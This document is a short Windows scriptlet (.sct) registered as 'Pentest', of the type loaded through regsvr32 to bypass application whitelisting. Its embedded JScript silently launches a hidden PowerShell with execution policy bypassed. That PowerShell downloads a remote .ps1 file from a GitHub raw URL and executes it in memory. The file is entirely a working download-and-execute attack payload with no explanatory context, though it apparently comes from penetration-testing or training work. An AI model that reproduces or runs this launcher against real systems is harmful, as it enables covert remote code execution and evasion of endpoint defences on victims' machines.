<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
 
<![CDATA[   
var c= 'powershell.exe -w hidden -ep Bypass -nologo -noprofile "IEX ((new-object net.webclient).downloadstring(\'https://raw.githubusercontent.com/phamphuqui1998/RE_basic/master/TestPS/Test_regsvr32.ps1\'))"'; 
new ActiveXObject("WScript.Shell").Run(c,0);
]]>
 
</script>
</registration>
</scriptlet>
